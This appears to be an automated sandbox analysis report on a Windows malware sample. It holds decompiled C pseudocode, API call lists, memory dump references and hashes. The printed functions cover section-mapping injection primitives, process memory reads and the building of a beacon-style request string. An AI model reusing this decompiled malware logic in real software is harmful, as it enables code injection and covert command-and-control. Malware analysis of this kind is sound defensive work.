                                                            							goto L27;
                                                            						}
                                                            						_t60 = _t59 + 0x964da13a;
                                                            						__eflags = _t60;
                                                            						_v20 = _t60;
                                                            						goto L26;
                                                            					}
                                                            				}
                                                            				L27:
                                                            				return _v20;
                                                            			}
                                                            0x6e4b160b
                                                            0x6e4b1613
                                                            0x6e4b1613
                                                            0x6e4b1618
                                                            0x6e4b161a
                                                            0x6e4b1621
                                                            0x6e4b1623
                                                            0x6e4b1623
                                                            0x6e4b1623
                                                            0x00000000
                                                            0x6e4b1623
                                                            0x00000000
                                                            0x6e4b1604
                                                            0x6e4b15b3
                                                            0x6e4b15b5
                                                            0x6e4b15b7
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b15b7
                                                            0x6e4b1637
                                                            0x6e4b1637
                                                            0x6e4b163e
                                                            0x6e4b1643
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1649
                                                            0x6e4b1654
                                                            0x00000000
                                                            0x6e4b1654
                                                            0x6e4b164b
                                                            0x6e4b164b
                                                            0x6e4b1651
                                                            0x00000000
                                                            0x6e4b1651
                                                            0x6e4b157f
                                                            0x6e4b1655
                                                            0x6e4b165a

                                                            APIs
                                                            • LoadLibraryA.KERNELBASE ref: 6E4B158A
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 6E4B15FC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID:
                                                            • API String ID: 2574300362-0
                                                            • Opcode ID: 8a48a5d92633dfb7b84d408996cbde42c4d2a64f391d07fe6b8d5ec0e0c8a947
                                                            • Instruction ID: 473b181b5843783e6c1d2d73f471dd5dc7f57dd61de151e69bacaf93a4c83296
                                                            • Opcode Fuzzy Hash: 8a48a5d92633dfb7b84d408996cbde42c4d2a64f391d07fe6b8d5ec0e0c8a947
                                                            • Instruction Fuzzy Hash: D5313771A0020A9FDB44CFA9C894EAEB7F8FF45344F14406AD916EB345E770EA49CB60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E00DD3C64(intOrPtr* __eax, void** _a4) {
                                                            				int _v12;
                                                            				void* _v16;
                                                            				void* _v20;
                                                            				void* _v24;
                                                            				int _v28;
                                                            				int _v32;
                                                            				intOrPtr _v36;
                                                            				int _v40;
                                                            				int _v44;
                                                            				void* _v48;
                                                            				void* __esi;
                                                            				long _t34;
                                                            				void* _t39;
                                                            				void* _t47;
                                                            				intOrPtr* _t48;
                                                            
                                                            				_t48 = __eax;
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				asm("stosd");
                                                            				_v24 =  *((intOrPtr*)(__eax + 4));
                                                            				_v16 = 0;
                                                            				_v12 = 0;
                                                            				_v48 = 0x18;
                                                            				_v44 = 0;
                                                            				_v36 = 0x40;
                                                            				_v40 = 0;
                                                            				_v32 = 0;
                                                            				_v28 = 0;
                                                            				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                                            				if(_t34 < 0) {
                                                            					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                                            				} else {
                                                            					 *_t48 = _v16;
                                                            					_t39 = E00DD37E0(_t48,  &_v12); // executed
                                                            					_t47 = _t39;
                                                            					if(_t47 != 0) {
                                                            						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                                            					} else {
                                                            						memset(_v12, 0, _v24);
                                                            						 *_a4 = _v12;
                                                            					}
                                                            				}
                                                            				return _t47;
                                                            			}

                                                            APIs
                                                            • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,00DD20F8), ref: 00DD3CC1
                                                              • Part of subcall function 00DD37E0: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00DD3CD6,00000002,00000000,?,?,00000000,?,?,00DD3CD6,00000000), ref: 00DD380D
                                                            • memset.NTDLL ref: 00DD3CE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Section$CreateViewmemset
                                                            • String ID:
                                                            • API String ID: 2533685722-0
                                                            • Opcode ID: 575fa4710d5ff5a1ea186f9f222b5de923179de98ef6dc9a7f348c8f399866c7
                                                            • Instruction ID: 8b267685b9b36e039e4c9f45da1a873eb1da89bd339b606b77ede38e1ef37341
                                                            • Opcode Fuzzy Hash: 575fa4710d5ff5a1ea186f9f222b5de923179de98ef6dc9a7f348c8f399866c7
                                                            • Instruction Fuzzy Hash: EC211DB5D00209AFCB11DFA9C8859EEFBB9EF48354F10842AE656F3210D7319A488F61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                            • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressMemory64ProcReadVirtualWow64
                                                            • String ID:
                                                            • API String ID: 752694512-0
                                                            • Opcode ID: 98ec89cde59ed134fbebe6ad2ff4a62ba3c807b3cf230e080d05a04b8d7ad8d1
                                                            • Instruction ID: d81748acaec1895c75291025bea5ebc89646125df7a1dae6f6522c8c666cbf1f
                                                            • Opcode Fuzzy Hash: 98ec89cde59ed134fbebe6ad2ff4a62ba3c807b3cf230e080d05a04b8d7ad8d1
                                                            • Instruction Fuzzy Hash: DBF0E276500209BB8B12CF9AEC85C9EBBBAFB98750B14401DF601E3220DB75E955EB20
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E6E4B121F(void** __esi, PVOID* _a4) {
                                                            				long _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				long _t13;
                                                            
                                                            				_v16 = 0;
                                                            				asm("stosd");
                                                            				_v8 = 0;
                                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                            				if(_t13 < 0) {
                                                            					_push(_t13);
                                                            					return __esi[6]();
                                                            				}
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E4B124C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: b0aa3008a4b45d7105df2648f9a7f4d5a570f5f5c60d7ac90c50f81d71e6a31a
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction Fuzzy Hash: CDF01CB690020CBFEB119FA5CC85C9FBBBDEB44394B10493AF252E1190D670AE088A60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E00DD37E0(void** __esi, PVOID* _a4) {
                                                            				long _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				long _t13;
                                                            
                                                            				_v16 = 0;
                                                            				asm("stosd");
                                                            				_v8 = 0;
                                                            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                                            				if(_t13 < 0) {
                                                            					_push(_t13);
                                                            					return __esi[6]();
                                                            				}
                                                            				return 0;
                                                            			}

                                                            APIs
                                                            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00DD3CD6,00000002,00000000,?,?,00000000,?,?,00DD3CD6,00000000), ref: 00DD380D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: SectionView
                                                            • String ID:
                                                            • API String ID: 1323581903-0
                                                            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction ID: 6e26d39c233ac8fefd5cec7f55be9460578783a3b135df411544d764fdefd3c9
                                                            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                                            • Instruction Fuzzy Hash: E4F012B590020CBFDB119FA5CC85C9FBBBDEB44354B10893AB552E1191D6309E089B61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtQueryInformationProcess.NTDLL(00000000,00000402,00000018,00000000,0458C300), ref: 04570FBC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InformationProcessQuery
                                                            • String ID:
                                                            • API String ID: 1778838933-0
                                                            • Opcode ID: eca4c24ae03f616daa9a5f20bae9d4c5558c7a863d056d91985e86af1d1655bc
                                                            • Instruction ID: 7588f5a503bfcc8e4b7d37bce12f42b90287b423a0ec76e70ec88f82cee113f9
                                                            • Opcode Fuzzy Hash: eca4c24ae03f616daa9a5f20bae9d4c5558c7a863d056d91985e86af1d1655bc
                                                            • Instruction Fuzzy Hash: 0EF05E3130112A9B8720CE55E894D9FBBE8FB05B54B00D164F901EB290D730FD46EBE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 70%
                                                            			E00DD7106(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                                            				intOrPtr _v4;
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v12;
                                                            				intOrPtr _v16;
                                                            				void* _v24;
                                                            				intOrPtr _v40;
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				intOrPtr _t31;
                                                            				intOrPtr _t32;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t34;
                                                            				intOrPtr _t35;
                                                            				void* _t38;
                                                            				intOrPtr _t39;
                                                            				int _t42;
                                                            				void* _t43;
                                                            				intOrPtr _t44;
                                                            				intOrPtr _t48;
                                                            				intOrPtr _t52;
                                                            				intOrPtr _t55;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t62;
                                                            				intOrPtr _t66;
                                                            				intOrPtr* _t68;
                                                            				void* _t69;
                                                            				intOrPtr _t78;
                                                            				intOrPtr _t81;
                                                            				intOrPtr _t84;
                                                            				int _t87;
                                                            				intOrPtr _t88;
                                                            				int _t91;
                                                            				intOrPtr _t92;
                                                            				int _t95;
                                                            				void* _t98;
                                                            				void* _t99;
                                                            				void* _t103;
                                                            				intOrPtr _t105;
                                                            				long _t107;
                                                            				intOrPtr _t108;
                                                            				intOrPtr* _t109;
                                                            				long _t110;
                                                            				int _t111;
                                                            				void* _t112;
                                                            				void* _t113;
                                                            				void* _t114;
                                                            				void* _t115;
                                                            				void* _t117;
                                                            				void* _t118;
                                                            				void* _t120;
                                                            				void* _t121;
                                                            
                                                            				_t103 = __edx;
                                                            				_t110 = __eax;
                                                            				_v8 = 8;
                                                            				_t117 = RtlAllocateHeap( *0xdda290, 0, 0x800);
                                                            				if(_t117 != 0) {
                                                            					if(_t110 == 0) {
                                                            						_t110 = GetTickCount();
                                                            					}
                                                            					_t31 =  *0xdda018; // 0x7b557b46
                                                            					asm("bswap eax");
                                                            					_t32 =  *0xdda014; // 0x5cb11ae7
                                                            					asm("bswap eax");
                                                            					_t33 =  *0xdda010; // 0x15dc9586
                                                            					asm("bswap eax");
                                                            					_t34 =  *0xdda00c; // 0x67522d90
                                                            					asm("bswap eax");
                                                            					_t35 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t2 = _t35 + 0xddb622; // 0x74666f73
                                                            					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0xdda02c,  *0xdda004, _t110);
                                                            					_t38 = E00DD4155();
                                                            					_t39 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t3 = _t39 + 0xddb662; // 0x74707526
                                                            					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                                            					_t120 = _t118 + 0x38;
                                                            					_t112 = _t111 + _t42;
                                                            					if(_a12 != 0) {
                                                            						_t92 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t7 = _t92 + 0xddb66d; // 0x732526
                                                            						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                                            						_t120 = _t120 + 0xc;
                                                            						_t112 = _t112 + _t95;
                                                            					}
                                                            					_t43 = E00DD35BC(_t99);
                                                            					_t44 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t9 = _t44 + 0xddb38a; // 0x6d697426
                                                            					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                                            					_t48 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t11 = _t48 + 0xddb33b; // 0x74636126
                                                            					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                                            					_t52 =  *0xdda32c; // 0x39c95b0
                                                            					_t121 = _t120 + 0x1c;
                                                            					if(_t52 != 0) {
                                                            						_t88 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t13 = _t88 + 0xddb685; // 0x73797326
                                                            						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                                            						_t121 = _t121 + 0xc;
                                                            						_t114 = _t114 + _t91;
                                                            					}
                                                            					_t105 =  *0xdda37c; // 0x39c9630
                                                            					_a28 = E00DD49BA(0xdda00a, _t105 + 4);
                                                            					_t55 =  *0xdda31c; // 0x39c95e0
                                                            					_t107 = 0;
                                                            					if(_t55 != 0) {
                                                            						_t84 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t16 = _t84 + 0xddb8e9; // 0x3d736f26
                                                            						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                                            						_t121 = _t121 + 0xc;
                                                            						_t114 = _t114 + _t87;
                                                            					}
                                                            					_t56 =  *0xdda318; // 0x0
                                                            					if(_t56 != _t107) {
                                                            						_t81 =  *0xdda2d4; // 0x2bed5a8
                                                            						_t18 = _t81 + 0xddb8e2; // 0x3d706926
                                                            						wsprintfA(_t114 + _t117, _t18, _t56);
                                                            					}
                                                            					if(_a28 != _t107) {
                                                            						_t98 = RtlAllocateHeap( *0xdda290, _t107, 0x800);
                                                            						if(_t98 != _t107) {
                                                            							E00DD3D0C(GetTickCount());
                                                            							_t62 =  *0xdda37c; // 0x39c9630
                                                            							__imp__(_t62 + 0x40);
                                                            							asm("lock xadd [eax], ecx");
                                                            							_t66 =  *0xdda37c; // 0x39c9630
                                                            							__imp__(_t66 + 0x40);
                                                            							_t68 =  *0xdda37c; // 0x39c9630
                                                            							_t69 = E00DD637D(1, _t103, _t117,  *_t68); // executed
                                                            							_t115 = _t69;
                                                            							asm("lock xadd [eax], ecx");
                                                            							if(_t115 != _t107) {
                                                            								StrTrimA(_t115, 0xdd92ac);
                                                            								_push(_t115);
                                                            								_t108 = E00DD7067();
                                                            								_v4 = _t108;
                                                            								if(_t108 != 0) {
                                                            									 *_t115 = 0;
                                                            									__imp__(_t98, _a8);
                                                            									_t109 = __imp__;
                                                            									 *_t109(_t98, _t108);
                                                            									 *_t109(_t98, _t115);
                                                            									_t78 = E00DD3735(0xffffffffffffffff, _t98, _v12, _v8); // executed
                                                            									_v40 = _t78;
                                                            									if(_t78 != 0 && _t78 != 0x10d2) {
                                                            										E00DD454A();
                                                            									}
                                                            									HeapFree( *0xdda290, 0, _v24);
                                                            								}
                                                            								HeapFree( *0xdda290, 0, _t115);
                                                            								_t107 = 0;
                                                            							}
                                                            							HeapFree( *0xdda290, _t107, _t98);
                                                            						}
                                                            						HeapFree( *0xdda290, _t107, _a20);
                                                            					}
                                                            					RtlFreeHeap( *0xdda290, _t107, _t117); // executed
                                                            				}
                                                            				return _v16;
                                                            			}

                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00DD7124
                                                            • GetTickCount.KERNEL32 ref: 00DD7138
                                                            • wsprintfA.USER32 ref: 00DD7187
                                                            • wsprintfA.USER32 ref: 00DD71A4
                                                            • wsprintfA.USER32 ref: 00DD71C5
                                                            • wsprintfA.USER32 ref: 00DD71E3
                                                            • wsprintfA.USER32 ref: 00DD71F8
                                                            • wsprintfA.USER32 ref: 00DD7219
                                                            • wsprintfA.USER32 ref: 00DD7253
                                                            • wsprintfA.USER32 ref: 00DD7273
                                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DD728E
                                                            • GetTickCount.KERNEL32 ref: 00DD729E
                                                            • RtlEnterCriticalSection.NTDLL(039C95F0), ref: 00DD72B2
                                                            • RtlLeaveCriticalSection.NTDLL(039C95F0), ref: 00DD72D0
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63A8
                                                              • Part of subcall function 00DD637D: lstrlen.KERNEL32(00000000,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63B0
                                                              • Part of subcall function 00DD637D: strcpy.NTDLL ref: 00DD63C7
                                                              • Part of subcall function 00DD637D: lstrcat.KERNEL32(00000000,00000000), ref: 00DD63D2
                                                              • Part of subcall function 00DD637D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00DD72E3,?,00000000,00DD72E3,00000000,039C9630), ref: 00DD63EF
                                                            • StrTrimA.SHLWAPI(00000000,00DD92AC,00000000,039C9630), ref: 00DD72FE
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                              • Part of subcall function 00DD7067: lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD7067: lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                              • Part of subcall function 00DD7067: lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 00DD731C
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD732A
                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00DD732E
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DD735E
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00DD736D
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,039C9630), ref: 00DD737D
                                                            • HeapFree.KERNEL32(00000000,?), ref: 00DD738E
                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00DD739C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                                            • String ID: F{U{
                                                            • API String ID: 1837416118-3347341033
                                                            • Opcode ID: 5a0438a2990f147a2d90102ae9a1acb50740f701bcf6cfa4eb6f2b0a39d4fe67
                                                            • Instruction ID: 97f0c02aba8f8ad4e2b7c88396f22b8f2d5daf7d86cc3883fecd7ae771877eb4
                                                            • Opcode Fuzzy Hash: 5a0438a2990f147a2d90102ae9a1acb50740f701bcf6cfa4eb6f2b0a39d4fe67
                                                            • Instruction Fuzzy Hash: D571AE71502304AFC721DBADEC88E677BEDEB88310B094457F949C3360E636E8059B76
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 0456699E
                                                            • RtlDeleteCriticalSection.NTDLL(0458C2E0), ref: 045669D1
                                                            • RtlDeleteCriticalSection.NTDLL(0458C300), ref: 045669D8
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A07
                                                            • ReleaseMutex.KERNEL32(0000045C,00000000,?,?,?,04583A85), ref: 04566A18
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A24
                                                            • ResetEvent.KERNEL32(00000000,00000000,?,?,?,04583A85), ref: 04566A30
                                                            • CloseHandle.KERNEL32(?,?,04583A85), ref: 04566A3C
                                                            • SleepEx.KERNELBASE(00000064,00000001,00000000,?,?,?,04583A85), ref: 04566A42
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566A56
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,04583A85), ref: 04566A79
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(01348118), ref: 04566AB2
                                                            • SleepEx.KERNEL32(00000064,00000001,?,?,04583A85), ref: 04566ACE
                                                            • CloseHandle.KERNEL32(049B8418,?,?,04583A85), ref: 04566AF5
                                                            • LocalFree.KERNEL32(?,?,04583A85), ref: 04566B05
                                                              • Part of subcall function 0456FBEE: GetVersion.KERNEL32(?,00000000,73BCF720,?,0456698F,00000000,?,?,?,04583A85), ref: 0456FC12
                                                              • Part of subcall function 0456FBEE: GetModuleHandleA.KERNEL32(?,049B9759,?,0456698F,00000000,?,?,?,04583A85), ref: 0456FC2F
                                                              • Part of subcall function 0456FBEE: GetProcAddress.KERNEL32(00000000), ref: 0456FC36
                                                              • Part of subcall function 0456CFBA: RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CFC4
                                                              • Part of subcall function 0456CFBA: RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456D000
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Handle$CloseCriticalSectionSleep$DeleteFree$AddressEnterEventExceptionHandlerHeapLeaveLocalModuleMutexProcReleaseRemoveResetVectoredVersion
                                                            • String ID:
                                                            • API String ID: 1924086638-0
                                                            • Opcode ID: 055163d4036342ecbba27399e68c8f4a823de23cb47d912cb97b4aee6463ca95
                                                            • Instruction ID: 4e22ff798378b62067f6d3fe561785a32c9bc6b3af4bb8dc36ef8a1bb681bd1d
                                                            • Opcode Fuzzy Hash: 055163d4036342ecbba27399e68c8f4a823de23cb47d912cb97b4aee6463ca95
                                                            • Instruction Fuzzy Hash: 55413031600202EBDB21AFA5FCC4A5877AAFB40745B55502DF606F7290CF79AC98FB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 83%
                                                            			E00DD6D30(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                            				struct %anon52 _v8;
                                                            				long _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				signed int _v24;
                                                            				intOrPtr _v32;
                                                            				union _LARGE_INTEGER _v36;
                                                            				intOrPtr _v40;
                                                            				void* _v44;
                                                            				void _v88;
                                                            				char _v92;
                                                            				struct %anon52 _t46;
                                                            				intOrPtr _t51;
                                                            				long _t53;
                                                            				void* _t54;
                                                            				struct %anon52 _t61;
                                                            				long _t65;
                                                            				signed int _t66;
                                                            				long _t68;
                                                            				void* _t69;
                                                            				void* _t71;
                                                            				signed int _t72;
                                                            				intOrPtr _t74;
                                                            				intOrPtr _t76;
                                                            				void** _t78;
                                                            				void* _t80;
                                                            
                                                            				_t74 = __edx;
                                                            				_v92 = 0;
                                                            				memset( &_v88, 0, 0x2c);
                                                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                            				_v44 = _t46;
                                                            				if(_t46 == 0) {
                                                            					_v8.LowPart = GetLastError();
                                                            				} else {
                                                            					_push(0xffffffff);
                                                            					_push(0xff676980);
                                                            					_push(0);
                                                            					_push( *0xdda298);
                                                            					_v20 = 0;
                                                            					_v16 = 0;
                                                            					L00DD7DDC();
                                                            					_v36.LowPart = _t46;
                                                            					_v32 = _t74;
                                                            					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                            					_t51 =  *0xdda2c4; // 0x24c
                                                            					_v40 = _t51;
                                                            					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                            					_v8.LowPart = _t53;
                                                            					if(_t53 == 0) {
                                                            						if(_a8 != 0) {
                                                            							L4:
                                                            							 *0xdda2a4 = 5;
                                                            						} else {
                                                            							_t69 = E00DD14C4(_t74); // executed
                                                            							if(_t69 != 0) {
                                                            								goto L4;
                                                            							}
                                                            						}
                                                            						_v12 = 0;
                                                            						L6:
                                                            						if(_v12 == 1 && ( *0xdda2b8 & 0x00000001) == 0) {
                                                            							_v12 = 2;
                                                            						}
                                                            						_t72 = _v12;
                                                            						_t58 = _t72 << 4;
                                                            						_t76 = _t80 + (_t72 << 4) - 0x54;
                                                            						_t73 = _t72 + 1;
                                                            						_v24 = _t72 + 1;
                                                            						_t61 = E00DD2FE6( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                                            						_v8.LowPart = _t61;
                                                            						if(_t61 != 0) {
                                                            							goto L17;
                                                            						}
                                                            						_t66 = _v24;
                                                            						_t90 = _t66 - 3;
                                                            						_v12 = _t66;
                                                            						if(_t66 != 3) {
                                                            							goto L6;
                                                            						} else {
                                                            							_t68 = E00DD1723(_t73, _t90,  &_v92, _a4, _a8); // executed
                                                            							_v8.LowPart = _t68;
                                                            						}
                                                            						goto L12;
                                                            						L17:
                                                            						__eflags = _t61 - 0x10d2;
                                                            						if(_t61 != 0x10d2) {
                                                            							_push(0xffffffff);
                                                            							_push(0xff676980);
                                                            							_push(0);
                                                            							_push( *0xdda29c);
                                                            							goto L21;
                                                            						} else {
                                                            							__eflags =  *0xdda2a0; // 0x1
                                                            							if(__eflags == 0) {
                                                            								goto L12;
                                                            							} else {
                                                            								_t61 = E00DD454A();
                                                            								_push(0xffffffff);
                                                            								_push(0xdc3cba00);
                                                            								_push(0);
                                                            								_push( *0xdda2a0);
                                                            								L21:
                                                            								L00DD7DDC();
                                                            								_v36.LowPart = _t61;
                                                            								_v32 = _t76;
                                                            								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                            								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                            								__eflags = _t65;
                                                            								_v8.LowPart = _t65;
                                                            								if(_t65 == 0) {
                                                            									goto L6;
                                                            								} else {
                                                            									goto L12;
                                                            								}
                                                            							}
                                                            						}
                                                            						L25:
                                                            					}
                                                            					L12:
                                                            					_t78 =  &_v92;
                                                            					_t71 = 3;
                                                            					do {
                                                            						_t54 =  *_t78;
                                                            						if(_t54 != 0) {
                                                            							RtlFreeHeap( *0xdda290, 0, _t54); // executed
                                                            						}
                                                            						_t78 =  &(_t78[4]);
                                                            						_t71 = _t71 - 1;
                                                            					} while (_t71 != 0);
                                                            					CloseHandle(_v44);
                                                            				}
                                                            				return _v8;
                                                            				goto L25;
                                                            			}
                                                            0x00dd6d30
                                                            0x00dd6d42
                                                            0x00dd6d45
                                                            0x00dd6d51
                                                            0x00dd6d59
                                                            0x00dd6d5c
                                                            0x00dd6ec2
                                                            0x00dd6d62
                                                            0x00dd6d62
                                                            0x00dd6d64
                                                            0x00dd6d69
                                                            0x00dd6d6a
                                                            0x00dd6d70
                                                            0x00dd6d73
                                                            0x00dd6d76
                                                            0x00dd6d84
                                                            0x00dd6d8f
                                                            0x00dd6d92
                                                            0x00dd6d94
                                                            0x00dd6da1
                                                            0x00dd6dab
                                                            0x00dd6daf
                                                            0x00dd6db2
                                                            0x00dd6db7
